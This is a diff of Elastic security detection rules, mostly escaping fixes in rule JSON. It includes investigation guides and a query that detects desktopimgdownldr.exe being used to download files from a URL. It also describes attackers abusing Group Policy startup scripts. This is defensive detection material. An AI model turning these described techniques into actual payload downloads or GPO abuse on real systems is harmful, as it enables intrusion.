48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"desktopimgdownldr.exe\" or process.pe.original_file_name == \"desktopimgdownldr.exe\") and\n process.args : \"/lockscreenurl:http*\"\n", + "references": [ + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "15c0b7a7-9c34-4869-b25b-fa6518414899", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "15c0b7a7-9c34-4869-b25b-fa6518414899_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_102.json b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_102.json index b609e48536d..604bc9de087 100644 --- a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_102.json @@ -54,7 +54,7 @@ ], "risk_score": 21, "rule_id": "15dacaa0-5b90-466b-acab-63435a59701a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_103.json b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_103.json index 8e61d73154e..cc7971c3af1 100644 --- a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_103.json @@ -54,7 +54,7 @@ ], "risk_score": 21, "rule_id": "15dacaa0-5b90-466b-acab-63435a59701a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_104.json b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_104.json index e174afabef2..7c673c7d54e 100644 --- a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_104.json @@ -54,7 +54,7 @@ ], "risk_score": 21, "rule_id": "15dacaa0-5b90-466b-acab-63435a59701a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_105.json b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_105.json index 273f320ce99..c346429ca05 100644 --- a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_105.json @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "15dacaa0-5b90-466b-acab-63435a59701a", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_106.json b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_106.json index 4864404ec23..3fae086f8a6 100644 --- a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_106.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_2.json b/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_2.json index 6eb782093d8..0d2c9d98004 100644 --- a/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_2.json +++ b/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_2.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_3.json b/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_3.json index ac29e70f6b8..38bc0547fbd 100644 --- a/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_3.json +++ b/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_3.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_102.json b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_102.json index 94fd8abeb31..c9eb0003d55 100644 --- a/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_102.json +++ b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_102.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_103.json b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_103.json index 22bfe1983d9..8909bd45312 100644 --- a/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_103.json +++ b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_103.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -78,7 +78,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_104.json b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_104.json index e0f2fac7b95..d1fed02a889 100644 --- a/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_104.json +++ b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_104.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_105.json b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_105.json index c5d43f0d749..448098eaf5d 100644 --- a/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_105.json +++ b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_105.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_102.json b/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_102.json index 99febfa5ff9..ed3227f7262 100644 --- a/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_102.json +++ b/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_103.json b/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_103.json index 0e6154e1518..70ea0ed4620 100644 --- a/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_103.json +++ b/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_103.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_104.json b/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_104.json index 9bc5e6e2209..5d076aa2b40 100644 --- a/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_104.json +++ b/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_104.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_205.json b/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_205.json index 26798357141..ff877a9ec03 100644 --- a/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_205.json +++ b/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_205.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_104.json b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_104.json index adec25b5906..25a7dec5b36 100644 --- a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_104.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_105.json b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_105.json index e38da2991d5..6e728158246 100644 --- a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_105.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_106.json b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_106.json index d547b4bd07a..64940e370e2 100644 --- a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_106.json +++ b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_106.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_107.json b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_107.json index 7e837426e18..4d57ad66b92 100644 --- a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_107.json +++ b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_107.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_108.json b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_108.json index 46e03586727..9cd9a6cde87 100644 --- a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_108.json +++ b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_108.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -116,7 +116,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_109.json b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_109.json index 72f5da56da7..ca915a0b33f 100644 --- a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_109.json +++ b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_109.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -116,7 +116,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_105.json b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_105.json index 759cce7cb35..3fffe2d6108 100644 --- a/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_105.json +++ b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_105.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Startup/Logon Script added to Group Policy Object", - "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of clients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the `scripts.ini` or `psscripts.ini` files. The scripts are stored in the following paths:\n - `\u003cGPOPath\u003e\\Machine\\Scripts\\`\n - `\u003cGPOPath\u003e\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `\u003cCommand\u003e` and `\u003cArguments\u003e` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of clients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the `scripts.ini` or `psscripts.ini` files. The scripts are stored in the following paths:\n - `\\Machine\\Scripts\\`\n - `\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 